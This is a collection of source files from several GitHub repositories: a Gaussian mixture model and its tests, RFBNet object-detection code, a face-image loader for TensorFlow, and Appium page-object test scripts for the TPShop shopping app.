raise ValueError("Invalid value for 'init': %s "
"'covariance_type' should be in "
"['full', 'spherical']"
% self.covariance_type)
if not self.update in [None, False, True]:
raise ValueError("update must be True or False. If not given"
"the best value will be chosen after the initialisation")
def _initialize_cov(self,points):
n_points,dim = points.shape
assignements = np.zeros((n_points,self.n_components))
M = dist_matrix(points,self.means)
for i in range(n_points):
index_min = np.argmin(M[i]) #the cluster number of the ith point is index_min
if (isinstance(index_min,np.int64)):
assignements[i][index_min] = 1
else: #Happens when two points are equally distant from a cluster mean
assignements[i][index_min[0]] = 1
N = np.sum(assignements,axis=0) + 1e-15
N /= n_points
S = np.zeros((self.n_components,dim,dim))
for i in range(self.n_components):
diff = points - self.means[i]
diff_weighted = diff * assignements[:,i:i+1]
S[i] = np.dot(diff_weighted.T,diff)
S[i].flat[::dim+1] += self.reg_covar
S /= n_points
self.cov = S / N[:,np.newaxis,np.newaxis]
def _initialize_weights(self,points):
n_points,_ = points.shape
log_prob = _log_normal_matrix(points,self.means,self.cov_chol,
self.covariance_type,self.n_jobs)
log_prob_norm = logsumexp(log_prob, axis=1)
log_resp = log_prob - log_prob_norm[:,np.newaxis]
self.log_weights = logsumexp(log_resp,axis=0) - np.log(n_points)
def initialize(self,points,init_choice='plus',n_init=1):
"""
This method initializes the Gaussian Mixture by setting the values of
the means, covariances and weights.
Parameters
----------
points : an array (n_points,dim)
Data on which the model is initialie using the seeds of kmeans++.
"""
n_points,dim = points.shape
if self.init == 'usual':
dist_min = np.inf
for i in range(n_init):
if init_choice == 'plus':
means,dist = initialization_plus_plus(self.n_components,points,info=True)
elif init_choice == 'kmeans':
means,_,dist = initialization_k_means(self.n_components,points,info=True)
if dist < dist_min:
dist_min = dist
self.means = means
self.iter = n_points + 1
if self.init in ['usual','read_kmeans']:
self._initialize_cov(points)
# Computation of self.cov_chol
self.cov_chol = np.empty(self.cov.shape)
for i in range(self.n_components):
self.cov_chol[i],inf = scipy.linalg.lapack.dpotrf(self.cov[i],lower=True)
if self.init in ['usual','read_kmeans']:
self._initialize_weights(points)
weights = np.exp(self.log_weights)
self.N = weights
self.X = self.means * self.N[:,np.newaxis]
self.S = self.cov * self.N[:,np.newaxis,np.newaxis]
# Computation of S_chol if update=True
if self.update:
if self.covariance_type == 'full':
self.S_chol = np.empty(self.S.shape)
for i in range(self.n_components):
self.S_chol[i],inf = scipy.linalg.lapack.dpotrf(self.S[i],lower=True)
elif self.covariance_type == 'spherical':
self.S_chol = np.sqrt(self.S)
self._is_initialized = True
if self.update is None:
if self.window < dim:
self.update = True
else:
self.update = False
def _step_E(self, points):
"""
In this step the algorithm evaluates the responsibilities of each points in each cluster
Parameters
----------
points : an array (n_points,dim)
Returns
-------
log_resp: an array (n_points,n_components)
an array containing the logarithm of the responsibilities.
log_prob_norm : an array (n_points,)
logarithm of the probability of each sample in points
"""
log_normal_matrix = _log_normal_matrix(points,self.means,self.cov_chol,
self.covariance_type,self.n_jobs)
log_product = log_normal_matrix + self.log_weights
log_prob_norm = logsumexp(log_product,axis=1)
log_resp = log_product - log_prob_norm[:,np.newaxis]
return log_prob_norm,log_resp
def _step_M(self):
"""
In this step the algorithm updates the values of the parameters
(log_weights, means, covariances).
Parameters
----------
points : an array (n_points,dim)
log_resp: an array (n_points,n_components)
an array containing the logarithm of the responsibilities.
"""
self.log_weights = np.log(self.N)
self.means = self.X / self.N[:,np.newaxis]
self.cov = self.S / self.N[:,np.newaxis,np.newaxis]
if self.update:
self.cov_chol = self.S_chol/np.sqrt(self.N)[:,np.newaxis,np.newaxis]
else:
for i in range(self.n_components):
self.cov_chol[i],inf = scipy.linalg.lapack.dpotrf(self.cov[i],lower=True)
def _sufficient_statistics(self,points,log_resp):
"""
In this step computes the value of sufficient statistics (N,X and S)
given the responsibilities.
They will be used to update the parameters of the model.
Parameters
----------
points : an array (n_points,dim)
log_resp: an array (n_points,n_components)
an array containing the logarithm of the responsibilities.
"""
n_points,dim = points.shape
resp = np.exp(log_resp)
gamma = 1/((self.iter + n_points//2)**self.kappa)
# New sufficient statistics
N = resp.sum(axis=0) + 10 * np.finfo(resp.dtype).eps
N /= n_points
X = np.dot(resp.T,points)
X /= n_points
S = np.empty((self.n_components,dim,dim))
for i in range(self.n_components):
diff = points - self.means[i]
diff_weighted = diff * np.sqrt(resp[:,i:i+1])
S[i] = np.dot(diff_weighted.T,diff_weighted)
if self.update:
# diff_weighted is recquired in order to update cov_chol, so we begin
# its update here
u = np.sqrt(gamma/((1-gamma)*n_points)) * diff_weighted
for j in range(n_points):
cholupdate(self.S_chol[i],u[j])
S /= n_points
if self.update:
self.S_chol *= np.sqrt((1-gamma))
# Sufficient statistics update
self.N = (1-gamma)*self.N + gamma*N
self.X = (1-gamma)*self.X + gamma*X
self.S = (1-gamma)*self.S + gamma*S
def _convergence_criterion(self,points,_,log_prob_norm):
"""
Compute the log likelihood.
Parameters
----------
points : an array (n_points,dim)
log_prob_norm : an array (n_points,)
logarithm of the probability of each sample in points
Returns
-------
result : float
the log likelihood
"""
return np.sum(log_prob_norm)
def _get_parameters(self):
return (self.log_weights, self.means, self.cov)
def _set_parameters(self, params,verbose=True):
self.log_weights, self.means, self.cov = params
self.N = np.exp(self.log_weights)
self.X = self.means * self.N[:,np.newaxis]
self.S = self.cov * self.N[:,np.newaxis,np.newaxis]
for i in range(self.n_components):
self.cov_chol[i],inf = scipy.linalg.lapack.dpotrf(self.cov[i],lower=True)
if self.update:
self.S_chol[i],inf = scipy.linalg.lapack.dpotrf(self.S[i],lower=True)
def _limiting_model(self,points):
n_points,dim = points.shape
log_resp = self.predict_log_resp(points)
_,n_components = log_resp.shape
exist = np.zeros(n_components)
for i in range(n_points):
for j in range(n_components):
if np.argmax(log_resp[i])==j:
exist[j] = 1
idx_existing = np.where(exist==1)
log_weights = self.log_weights[idx_existing]
means = self.means[idx_existing]
cov = self.cov[idx_existing]
params = (log_weights, means, cov)
return params
```
#### File: Stage_ENS/test/test_batch_base.py
```python
import numpy as np
from scipy import linalg
from numpy.testing import assert_almost_equal
from megamix.batch.base import _log_normal_matrix, _compute_precisions_chol
from megamix.batch.base import _full_covariance_matrices, _spherical_covariance_matrices
def generate_mixing_coefficients(n_components):
pi = np.abs(np.random.randn(n_components))
return pi/pi.sum()
def generate_covariance_matrices_full(n_components,n_features):
cov = np.empty((n_components,n_features,n_features))
for i in range(n_components):
X = np.random.randn(10*n_features,n_features)
cov[i] = np.dot(X.T,X)
return cov
def generate_resp(n_points,n_components):
resp = np.abs(np.random.randn(n_points,n_components))
return resp/resp.sum(axis=1)[:,np.newaxis]
def test_log_normal_matrix_full():
n_points, n_components, n_features = 10,5,2
points = np.random.randn(n_points,n_features)
means = np.random.randn(n_components,n_features)
cov = generate_covariance_matrices_full(n_components,n_features)
# Beginnig of the test
log_det_cov = np.log(np.linalg.det(cov))
precisions = np.linalg.inv(cov)
log_prob = np.empty((n_points,n_components))
for i in range(n_components):
diff = points - means[i]
y = np.dot(diff,np.dot(precisions[i],diff.T))
log_prob[:,i] = np.diagonal(y)
expected_log_normal_matrix = -0.5 * (n_features * np.log(2*np.pi) +
log_prob + log_det_cov)
predected_log_normal_matrix = _log_normal_matrix(points,means,cov,'full')
assert_almost_equal(expected_log_normal_matrix,predected_log_normal_matrix)
def test_compute_precisions_chol_full():
n_components, n_features = 5,2
cov = generate_covariance_matrices_full(n_components,n_features)
expected_precisions_chol = np.empty((n_components,n_features,n_features))
for i in range(n_components):
cov_chol = linalg.cholesky(cov[i],lower=True)
expected_precisions_chol[i] = np.linalg.inv(cov_chol).T
predected_precisions_chol = _compute_precisions_chol(cov,'full')
assert_almost_equal(expected_precisions_chol,predected_precisions_chol)
def test_full_covariance_matrices():
n_points, n_components, n_features = 10,5,2
points = np.random.randn(n_points,n_features)
means = np.random.randn(n_components,n_features)
pi = generate_mixing_coefficients(n_components)
resp = generate_resp(n_points,n_components)
weights = pi * n_points
reg_covar = 1e-6
expected_full_covariance_matrices = np.empty((n_components,n_features,n_features))
for i in range(n_components):
diff = points - means[i]
diff_weighted = diff*resp[:,i:i+1]
cov = 1/weights[i] * np.dot(diff_weighted.T,diff)
cov.flat[::n_features+1] += reg_covar
expected_full_covariance_matrices[i] = cov
predected_full_covariance_matrices = _full_covariance_matrices(points,means,weights,resp,reg_covar)
assert_almost_equal(expected_full_covariance_matrices,predected_full_covariance_matrices)
def test_spherical_covariance_matrices():
n_points, n_components, n_features = 10,5,2
points = np.random.randn(n_points,n_features)
means = np.random.randn(n_components,n_features)
pi = generate_mixing_coefficients(n_components)
resp = generate_resp(n_points,n_components)
weights = pi * n_points
reg_covar = 1e-6
expected_full_covariance_matrices = np.empty(n_components)
for i in range(n_components):
diff = points - means[i]
diff_weighted = diff * resp[:,i:i+1]
product = diff * diff_weighted
expected_full_covariance_matrices[i] = np.sum(product)/weights[i] + reg_covar
expected_full_covariance_matrices /= n_features
predected_full_covariance_matrices = _spherical_covariance_matrices(points,means,weights,resp,reg_covar)
assert_almost_equal(expected_full_covariance_matrices,predected_full_covariance_matrices)
``` |
{
"source": "14zwyan/RFBNet",
"score": 2
} |
#### File: layers/functions/refine_detection.py
```python
import torch
import torch.nn as nn
import torch.backends.cudnn as cudnn
from torch.autograd import Function
from torch.autograd import Variable
from utils.box_utils import decode
class RefineDetect(Function):
"""At test time, Detect is the final layer of SSD. Decode location preds,
apply non-maximum suppression to location predictions based on conf
scores and threshold to a top_k number of output predictions for both
confidence score and locations.
"""
def __init__(self, num_classes, bkg_label, cfg,obj_thresh=0.01):
self.num_classes = num_classes
self.background_label = bkg_label
self.variance = cfg['variance']
self.obj_thresh = obj_thresh
def forward(self, predictions, prior):
"""
Args:
loc_data: (tensor) Loc preds from loc layers
Shape: [batch,num_priors*4]
conf_data: (tensor) Shape: Conf preds from conf layers
Shape: [batch*num_priors,num_classes]
prior_data: (tensor) Prior boxes and variances from priorbox layers
Shape: [1,num_priors,4]
"""
loc, conf,obj = predictions
loc_data = loc.data
conf_data = conf.data
obj_data = obj.data
prior_data = prior.data
no_obj_index = obj_data[:,:,1] < self.obj_thresh
#print(conf_data.shape)
#print(no_obj_index.shape)
conf_data[ no_obj_index.unsqueeze(2).expand_as(conf_data)] = 0
num = loc_data.size(0) # batch size
self.num_priors = prior_data.size(0)
self.boxes = torch.zeros(1, self.num_priors, 4)
self.scores = torch.zeros(1, self.num_priors, self.num_classes)
self.obj = torch.zeros(1,self.num_priors,2)
if loc_data.is_cuda:
self.boxes = self.boxes.cuda()
self.scores = self.scores.cuda()
self.obj =self.obj.cuda()
if num == 1:
# size batch x num_classes x num_priors
conf_preds = conf_data.unsqueeze(0)
obj_preds = obj_data.unsqueeze(0)
else:
conf_preds = conf_data.view(num, num_priors,
self.num_classes)
obj_preds = obj_data.view(nu,num_priors,2)
self.boxes.expand_(num, self.num_priors, 4)
self.scores.expand_(num, self.num_priors, self.num_classes)
self.obj.expand_(num,self.num_priors,2)
# Decode predictions into bboxes.
for i in range(num):
decoded_boxes = decode(loc_data[i], prior_data, self.variance)
conf_scores = conf_preds[i].clone()
obj_scores = obj_preds[i].clone()
self.boxes[i] = decoded_boxes
self.scores[i] = conf_scores
self.obj[i] = obj_scores
return self.boxes, self.scores,self.obj
```
#### File: layers/modules/joint_attention_0812_v2.py
```python
import torch.nn as nn
import torch
from torch.nn import functional as F
from torch.autograd import Variable
from .se_module import SELayer
class ConvBlock(nn.Module):
def __init__(self,in_channel,out_channel,kernel_size,stride=1,padding=0):
super(ConvBlock,self).__init__()
self.conv = nn.Conv2d(in_channel,out_channel,kernel_size,stride=stride,padding=padding)
self.bn = nn.BatchNorm2d(out_channel)
def forward(self,x):
return F.relu( self.bn( self.conv(x) ) )
class Local_Global_Attention_Hybrid(nn.Module):
def __init__(self,in_channel,channel_chunck,channel_reduction):
super(Local_Global_Attention_Hybrid,self).__init__()
self.channel_reduction= channel_reduction
self.in_channel = in_channel
self.channel_chunck = channel_chunck
self.ses = nn.ModuleList([ SELayer(channel_chunck,channel_reduction) ] * ( in_channel//channel_chunck))
self.nlayers = in_channel // channel_chunck
self.global_attention_fc = nn.Sequential(
nn.Linear( self.nlayers, 1 ),
nn.ReLU(True),
nn.Linear( 1, self.nlayers)
)
self.global_pool = nn.AdaptiveAvgPool2d(1)
self.conv1s = nn.ModuleList( [ ConvBlock(1,1,3,stride=2,padding=1)]*self.nlayers )
self.conv2s = nn.ModuleList( [ ConvBlock(1,1,1)]*self.nlayers)
self.global_spatial_decoder = nn.Sequential(
ConvBlock(self.nlayers,1,1,1,0),
ConvBlock(1,self.nlayers,1,1,0)
)
def forward(self,x):
layers = list( torch.split(x,self.channel_chunck,dim=1) )
_,_,h,w = layers[0].size()
layers = list( map( lambda x,y : y(x) , layers, self.ses ) )
# all layes has been channel attended, then genearates scale descriptor
#based on average of attended features
scale_descripotr = torch.cat(list( map(lambda x : torch.mean(x,1,True), layers) ),dim=1)
#print('scale_descripotr shape:'+str(scale_descripotr.shape))
# c is supposed to be 3
b, c, h, w = scale_descripotr.size()
scale_weight = self.global_pool( scale_descripotr ).view(b,c)
scale_weight = self.global_attention_fc( scale_weight ).view(b,c,1,1)
#print('scale weight shape'+str(scale_weight.shape))
weight = list(torch.split( scale_weight,1,dim=1 ))
#print('weight shape',weight.shape)
layers = list( map( lambda x,y : x*y , layers,weight ))
#layers = torch.cat( layers,dim=1 )
#After channel wise attention, pixel wise attention
avg = list( map( lambda x : x.mean(1,keepdim=True) , layers ) )
avg = list( map( lambda x,y :y(x) , avg, self.conv1s))
avg = list( map( lambda x : F.upsample(x,(h,w),mode='bilinear'),avg) )
spatial_descriptor = torch.cat( list( map( lambda x,y : y(x) , avg ,self.conv2s )) ,dim=1)
spatial_descriptor = F.sigmoid( self.global_spatial_decoder( spatial_descriptor ) )
spatial_weights = list(torch.split( spatial_descriptor,1,dim=1 ))
layers = torch.cat( list( map( lambda x, y :x*y, layers, spatial_weights)) , dim=1)
return layers
if __name__ == '__main__':
a = torch.randn((2,32*3,8,8))
hierar_attention = Local_Global_Attention_Hybrid(32*3,32,16)
a= Variable(a)
a = hierar_attention(a)
state_dict = hierar_attention.state_dict()
for name, value in state_dict.items():
print(name)
print(a.shape)
```
#### File: 14zwyan/RFBNet/test_ssd_fusion_0901_v2.py
```python
from __future__ import print_function
import sys
import os
os.environ['CUDA_VISIBLE_DEVICES'] = "2"
import pickle
import argparse
import torch
import torch.nn as nn
import torch.backends.cudnn as cudnn
import torchvision.transforms as transforms
import numpy as np
from torch.autograd import Variable
from data import VOCroot,COCOroot
from data import AnnotationTransform, VOCDetection, BaseTransform, VOC_300,VOC_512
from ssd_fusion_0901_v2_E import build_ssd
import torch.utils.data as data
from layers.functions import Detect,PriorBox
from utils.nms_wrapper import nms
from utils.timer import Timer
parser = argparse.ArgumentParser(description='Receptive Field Block Net')
parser.add_argument('-v', '--version', default='RFB_vgg',
help='RFB_vgg ,RFB_E_vgg or RFB_mobile version.')
parser.add_argument('-s', '--size', default='300',
help='300 or 512 input size.')
parser.add_argument('-d', '--dataset', default='VOC',
help='VOC or COCO version')
parser.add_argument('-m', '--trained_model', default='weights/RFB300_80_5.pth',
type=str, help='Trained state_dict file path to open')
parser.add_argument('--save_folder', default='eval/', type=str,
help='Dir to save results')
parser.add_argument('--cuda', default=True, type=bool,
help='Use cuda to train model')
parser.add_argument('--cpu', default=False, type=bool,
help='Use cpu nms')
parser.add_argument('--retest', default=False, type=bool,
help='test cache results')
parser.add_argument('--device',type=int,help='cuda device')
args = parser.parse_args()
if not os.path.exists(args.save_folder):
os.mkdir(args.save_folder)
if args.dataset == 'VOC':
cfg = (VOC_300, VOC_512)[args.size == '512']
else:
cfg = (COCO_300, COCO_512)[args.size == '512']
priorbox = PriorBox(cfg)
priors =Variable(priorbox.forward(),volatile=True)
priors = priors.cuda()
def test_net(save_folder, net, detector, cuda, testset, transform, max_per_image=300, thresh=0.005,obj_thresh=0.01):
if not os.path.exists(save_folder):
os.mkdir(save_folder)
# dump predictions and assoc. ground truth to text file for now
num_images = len(testset)
num_classes = (21, 81)[args.dataset == 'COCO']
all_boxes = [[[] for _ in range(num_images)]
for _ in range(num_classes)]
_t = {'im_detect': Timer(), 'misc': Timer()}
det_file = os.path.join(save_folder, 'detections.pkl')
total_detect_time = 0
total_nms_time = 0
if args.retest:
f = open(det_file,'rb')
all_boxes = pickle.load(f)
print('Evaluating detections')
testset.evaluate_detections(all_boxes, save_folder)
return
for i in range(num_images):
img = testset.pull_image(i)
scale = torch.Tensor([img.shape[1], img.shape[0],
img.shape[1], img.shape[0]])
x =Variable( transform(img).unsqueeze(0),volatile=True)
if cuda:
x = x.cuda()
scale = scale.cuda()
_t['im_detect'].tic()
out = net(x) # forward pass
boxes, scores = detector.forward(out,priors)
detect_time = _t['im_detect'].toc()
boxes = boxes[0]
scores=scores[0]
boxes *= scale
boxes = boxes.cpu().numpy()
scores = scores.cpu().numpy()
# scale each detection back up to the image
total_detect_time += detect_time
if i == 0 :
total_detect_time -= detect_time
_t['misc'].tic()
for j in range(1, num_classes):
inds = np.where(scores[:, j] > thresh )[0]
if len(inds) == 0:
all_boxes[j][i] = np.empty([0, 5], dtype=np.float32)
continue
c_bboxes = boxes[inds]
c_scores = scores[inds, j]
c_dets = np.hstack((c_bboxes, c_scores[:, np.newaxis])).astype(
np.float32, copy=False)
keep = nms(c_dets, 0.45, force_cpu=args.cpu)
c_dets = c_dets[keep, :]
all_boxes[j][i] = c_dets
if max_per_image > 0:
image_scores = np.hstack([all_boxes[j][i][:, -1] for j in range(1,num_classes)])
if len(image_scores) > max_per_image:
image_thresh = np.sort(image_scores)[-max_per_image]
for j in range(1, num_classes):
keep = np.where(all_boxes[j][i][:, -1] >= image_thresh)[0]
all_boxes[j][i] = all_boxes[j][i][keep, :]
nms_time = _t['misc'].toc()
total_nms_time += nms_time
if i==0:
total_nms_time -= nms_time
if i % 20 == 0 and i !=0:
print('im_detect: {:d}/{:d} {:.3f}s {:.3f}s'
.format(i + 1, num_images, detect_time, nms_time))
print('detect:%4f nms: %4f fps:%4f %4f'%(total_detect_time,total_nms_time,
(i-1)/(total_nms_time+total_detect_time),(i-1)/total_detect_time))
_t['im_detect'].clear()
_t['misc'].clear()
with open(det_file, 'wb') as f:
pickle.dump(all_boxes, f, pickle.HIGHEST_PROTOCOL)
print('Evaluating detections')
testset.evaluate_detections(all_boxes, save_folder)
if __name__ == '__main__':
# load net
img_dim = (300,512)[args.size=='512']
num_classes = (21, 81)[args.dataset == 'COCO']
net = build_ssd('test', img_dim, num_classes) # initialize detector
state_dict = torch.load(args.trained_model,map_location = lambda storage,loc : storage)
# create new OrderedDict that does not contain `module.`
from collections import OrderedDict
new_state_dict = OrderedDict()
for k, v in state_dict.items():
head = k[:7]
if head == 'module.':
name = k[7:] # remove `module.`
else:
name = k
new_state_dict[name] = v
net.load_state_dict(new_state_dict)
net.eval()
print('Finished loading model!')
print(net)
# load data
if args.dataset == 'VOC':
testset = VOCDetection(
VOCroot, [('2007', 'test')], None, AnnotationTransform())
elif args.dataset == 'COCO':
testset = COCODetection(
COCOroot, [('2014', 'minival')], None)
#COCOroot, [('2015', 'test-dev')], None)
else:
print('Only VOC and COCO dataset are supported now!')
if args.cuda:
net = net.cuda()
cudnn.benchmark = True
else:
net = net.cpu()
# evaluation
#top_k = (300, 200)[args.dataset == 'COCO']
top_k = 200
detector = Detect(num_classes,0,cfg)
save_folder = os.path.join(args.save_folder,args.dataset)
rgb_means = ((104, 117, 123),(103.94,116.78,123.68))[args.version == 'RFB_mobile']
test_net(save_folder, net, detector, args.cuda, testset,
BaseTransform(net.size, rgb_means, (2, 0, 1)),
top_k, thresh=0.01)
``` |
{
"source": "150014739/Face_Recognition_Tensorflow",
"score": 3
} |
#### File: 150014739/Face_Recognition_Tensorflow/load_training_image.py
```python
import os
import glob
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import numpy as np
import re
import cv2
class LoadTrainingImage:
def __init__(self, path, classes):
self.path = path;
self.classes = classes;
self.image_list = []
self.label_list = []
self.image_data = []
self.label_data = []
self.default_image_width = 28 #Default value;
self.default_image_height = 28 #Default value;
def print_path(self):
print(self.path);
print(self.image_list);
print(self.label_list);
print(self.image_data)
print(self.label_data)
print(self.default_image_width)
print(self.default_image_height)
print("Info: Printing finished.")
def next_batch(self, batch_size):
batch_data = [];
batch_target = [];
if (batch_size <= 0):
print("Error: batch size must be bigger than 0.")
return batch_data, batch_target
train_data = self.image_data;
train_target = self.label_data;
index = [ i for i in range(0,len(train_target)) ]
np.random.shuffle(index);
for i in range(0,batch_size):
batch_data.append(train_data[index[i]]);
batch_target.append(train_target[index[i]])
# temp = np.array(batch_data)
# print(temp)
return batch_data, batch_target
def show_example(self, index):
image_list_len = len(self.image_list)
if (index >= len(self.image_list)):
print("Error: Current index is %d but image_list size is %d."%(index, image_list_len));
return
#Show one of the image as the example;
image_example = index;
print("Info: Show one image(index %d) as an example."%image_example)
test_image = self.image_list[image_example];
img = mpimg.imread(test_image) #
img.shape
plt.imshow(img)
plt.axis('off')
plt.show()
def one_hot(self, classes, index):
if (classes<=0 or index<0):
print("Error: %d or %d should be all large than 0"%(classes, index))
if (classes <= index):
print("Error: classes %d should be larger than index %d"%(classes, index))
data = [0 for i in range(classes)]
data[index] = 1
ret_data = np.array(data)
return ret_data;
def load(self, display):
classes = self.classes;
path = self.path;
#Step 1 - Load all image names to image_list;
# Load all image labels to label_list;
filepaths=[os.path.join(path,"s%d"%i)for i in range (1,classes+1)]#
for one_folder in filepaths:
print("Info: Start to load files in %s folder."%one_folder);
for filename in glob.glob(one_folder+'/*.jpg'):
self.image_list.append(os.path.join(filename))#
temp_str = one_folder.split('\\');
length = len(temp_str);
self.label_list.append(temp_str[length-1])#
print("Info: Load %d images from %d folders successfully."%(len(self.image_list), len(filepaths)));
#Step 2 - Read image and store pixel data into image_data;
# Load image labels to label_data;
for index in range(len(self.image_list)):
#Save data to iamge_data and label_data; These data is for tensorflow training;
image_name = self.image_list[index];
img_color = cv2.imread(image_name)
img_gray = cv2.cvtColor(img_color, cv2.COLOR_BGR2GRAY)
img_size = img_gray.shape
img_gray_1d = np.array(img_gray).reshape(img_size[0]*img_size[1]);
self.image_data.append(img_gray_1d)
#Convert folder name from string to int, the face name only contains digital number from folder name;
#For example, folder name is string S5, then face name for that folder is int 5;
folder_name = self.label_list[index]
face_name = re.findall("\d+", folder_name)[0]
d0 = self.one_hot(classes, (int)(face_name) - 1) #The folder start from S1, so we should substract 1;
self.label_data.append(d0)
#Check images size is same or not; Comparing with first image;
if (index == 0):
#Update default value based on first image's size;
self.default_image_width = img_size[0]
self.default_image_height = img_size[1]
else:
image_width = img_size[0]
image_height = img_size[1]
if (image_width!=self.default_image_width or image_height!=self.default_image_height):
print("Error: Image %s, current size is (%d,%d), desired size is (%d,%d)"%
(image_name, image_width, image_height, self.default_image_width, self.default_image_height));
break;
#Display images according to user input;
if (display == 1):
plt.imshow(img_gray)
plt.axis('on')
plt.show()
print("Info: Show converted gray image %s."%image_name)
self.show_example(2)
if __name__=='__main__':
path = ".\\att_faces"
classes = 40
display = 0
face_time = LoadTrainingImage(path, classes)
face_time.load(display)
# face_time.print_path()
batch = face_time.next_batch(10)
face_time.one_hot(classes, 5)
``` |
{
"source": "15008477526/-",
"score": 3
} |
#### File: APP_aaaaaaaa/common/base_app.py
```python
from appium import webdriver
from appium.webdriver.common.touch_action import TouchAction
import random
desired_caps = {
'platformName': 'android',
'platformVersion': '5.1.1',
'deviceName': '36b7119e',
'appPackage': 'com.tpshop.malls',
'appActivity': '.SPMainActivity',
'unicodeKeyboard': True,
'resetKeyboard': True,
'noReset': True
}
def open_app():
"""打开app"""
return webdriver.Remote('http://127.0.0.1:4723/wd/hub', desired_caps)
class BaseApp(object):
def __init__(self, driver):
self.driver = driver
def quit(self):
"""关闭app"""
self.driver.quit()
def wait_page(self):
"""等待页面加载完成"""
try:
ac = self.driver.current_activity
self.driver.wait_activity(ac, 5, 0.5)
except:
return False
def find_element(self, locator):
"""定位单个元素"""
try:
if locator[0] == 'id':
return self.driver.find_element_by_id(locator[1])
elif locator[0] == 'class':
return self.driver.find_element_by_class_name(locator[1])
elif locator[0] == 'xpath':
return self.driver.find_element_by_xpath(locator[1])
elif locator[0] == 'content-desc':
return self.driver.find_element_by_accessibility_id(locator[1])
except:
return False
def find_elements(self, locator):
"""定位多个元素"""
try:
if locator[0] == 'id':
return self.driver.find_elements_by_id(locator[1])
elif locator[0] == 'class':
return self.driver.find_elements_by_class_name(locator[1])
elif locator[0] == 'xpath':
return self.driver.find_elements_by_xpath(locator[1])
elif locator[0] == 'content-desc':
return self.driver.find_elements_by_accessibility_id(locator[1])
except:
return False
def click(self, locator):
"""点击"""
element = self.find_element(locator)
try:
element.click()
except:
return False
def send_keys(self, locator, text):
"""输入"""
element = self.find_element(locator)
try:
element.clear()
element.send_keys(text)
except:
return False
def get_ele_text(self, locator):
"""获取元素文本"""
element = self.find_element(locator)
result = element.text
return result
def random_click(self, locator):
"""随机点击一个元素"""
elements = self.find_elements(locator)
element = random.choice(elements)
element.click()
def tap(self, horizon, vertical):
TouchAction(self.driver).tap(x=horizon, y=vertical).perform()
def iterate_and_click(self, locator):
elements = self.find_elements(locator)
for element in elements:
element.click()
```
#### File: APP_aaaaaaaa/page/C_1_search_page.py
```python
from page.B_main_page import MainPage
class SearchPage(MainPage):
"""搜索页面"""
search_content_loc = ('id', 'com.tpshop.malls:id/search_et') # 搜索内容
search_button_loc = ('id', 'com.tpshop.malls:id/search_btn') # 搜索按钮
search_good_loc = ('id', 'com.tpshop.malls:id/product_pic_img') # 搜索到的商品
serach_back_loc = ('id','com.tpshop.malls:id/title_back_img') # 点击返回
def input_search_content(self, text):
"""输入搜索内容"""
self.send_keys(self.search_content_loc, text)
def click_search_button(self):
"""点击搜索按钮"""
self.click(self.search_button_loc)
def click_search_good(self):
"""点击搜索到的商品"""
self.click(self.search_good_loc)
def click_search_back(self):
"""点击返回"""
self.click_search_back()
if __name__ == '__main__':
from common.base_app import open_app
from time import sleep
driver = open_app() # 打开TPShop,进入登录页面
search = SearchPage(driver)
search.input_account_num('13730626896') # 输入账号
search.input_password('<PASSWORD>') # 输入密码
search.wait_page() # 等待页面加载
search.click_confirm_login() # 点击登录
search.wait_page() # 等待页面加载
search.click_search() # 点击搜索框
search.input_search_content('容声冰箱') # 搜索容声冰箱
search.click_search_button() # 点击搜索按钮
sleep(1)
search.click_RSfridge() # 点击容声冰箱
sleep(1)
search.quit()
```
#### File: APP_aaaaaaaa/page/D_good_detail_page.py
```python
from page.C_1_search_page import SearchPage # 普通商品搜索页面
from page.C_2_group_purchase_page import GroupPurchasePage # 团购商品页面
from page.C_3_promotion_page import PromotionPage # 促销商品页面
from page.C_4_points_reward_page import PointsRewardPage # 积分商城页面
class GoodDetailPage(SearchPage, GroupPurchasePage, PromotionPage,PointsRewardPage):
"""商品详情页面"""
buy_loc = ('id', 'com.tpshop.malls:id/promptly_buy_tv') # 立即购买
confirm_buy_RS_loc = ('id', 'com.tpshop.malls:id/confirm_tv') # 确认购买
exchange_loc = ('id','com.tpshop.malls:id/buy_cart_tv') # 立即兑换(积分商品)
good_detail_back_loc = ('id','com.tpshop.malls:id/back_ll') # 返回
def click_buy(self):
"""点击<立即购买>"""
self.click(self.buy_loc)
def click_confrim_buy(self):
"""点击<确认购买>"""
self.click(self.confirm_buy_RS_loc)
def click_exchange(self):
"""点击<立即兑换>"""
self.click(self.exchange_loc)
def click_good_detail_back(self):
"""点击返回"""
self.click(self.good_detail_back_loc)
if __name__ == '__main__':
from common.base_app import open_app
from time import sleep
driver = open_app() # 打开TPShop,进入登录页面
RS = GoodDetailPage(driver)
RS.input_account_num('13730626896') # 输入账号
RS.input_password('<PASSWORD>') # 输入密码
RS.wait_page() # 等待页面加载
RS.click_confirm_login() # 点击登录
RS.wait_page() # 等待页面加载
sleep(2)
"""普通商品"""
# RS.click_search() # 点击搜索框
# RS.input_search_content('容声冰箱') # 搜索容声冰箱
# RS.click_search_button() # 点击搜索按钮
# RS.click_RSfridge() # 点击容声冰箱
"""团购商品"""
# RS.click_group_purchase() # 点击团购
# RS.wait_page() # 等待页面加载
# sleep(1)
# RS.click_sony_mobile() # 点击索尼手机
"""促销商品"""
# RS.click_promotion() # 点击促销商品
# RS.wait_page() # 等待页面加载
# sleep(1)
# RS.click_pomelo() # 点击Pomelo
"""积分商品"""
RS.click_points_reward() # 点击积分商城
RS.wait_page() # 等待页面加载
sleep(1)
RS.click_point_good() # 随机选择一个积分商品进行购买
RS.wait_page() # 等待页面加载
sleep(2)
RS.click_exchange() # 点击立即兑换
# RS.click_buy() # 点击立即购买
RS.click_confrim_buy() # 点击确认购买
sleep(3)
RS.quit()
```
#### File: APP_aaaaaaaa/page/E_confirm_order_page.py
```python
from page.D_good_detail_page import GoodDetailPage
class ConfirmOrderPage(GoodDetailPage):
"""确认订单--容声冰箱"""
select_address_RS_loc = ('id', 'com.tpshop.malls:id/order_address_tv') # 选择收货地址
consignee_RS_loc = ('id', 'com.tpshop.malls:id/address_consignee_tv') # 收货人地址第一个
use_order_balance_loc = ('id', 'com.tpshop.malls:id/order_balance_sth') # 使用余额
sub_order_RS_loc = ('id', 'com.tpshop.malls:id/submit_tv') # 提交订单
pay_pwd_RS_loc = ('id', 'com.tpshop.malls:id/pwd_et') # 支付密码
confirm_pay_pwd_RS_loc = ('id', 'com.tpshop.malls:id/sure_tv') # 确认支付密码
order_balance_loc = ('id', 'com.tpshop.malls:id/order_balance_tv') # 余额
balance_fee_loc = ('id', 'com.tpshop.malls:id/balance_fee_tv') # 支付的余额
